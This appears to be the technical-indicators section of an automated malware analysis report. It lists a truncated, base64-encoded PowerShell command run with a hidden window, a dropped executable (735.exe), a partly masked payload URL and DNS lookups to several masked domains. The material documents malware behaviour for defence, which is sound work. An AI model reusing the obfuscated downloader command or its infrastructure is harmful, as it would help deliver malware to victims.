Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABGAGEAaQBqAGIAcABwAGwAbABkAD0AJwBSAGIAagBrAHMAegBmAGcAbQBhAGEAbQBkACcAOwAkAFgAeABtAGsAZQBqAHAAagAgAD...
- %HOMEPATH%\735.exe
- %HOMEPATH%\735.exe
- %HOMEPATH%\735.exe
- http://xn#####c1bdfb.com.ua/wp-includes/iKdeWcRji/
- DNS ASK sp###edesign.eu
- DNS ASK xn#####c1bdfb.com.ua
- DNS ASK re##pt.site
- DNS ASK ca##erbd.tk
- DNS ASK to###artires.ca
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABGAGEAaQBqAGIAcABwAGwAbABkAD0AJwBSAGIAagBrAHMAegBmAGcAbQBhAGEAbQBkACcAOwAkAFgAeABtAGsAZQBqAHAAagAgAD...' (with hidden window)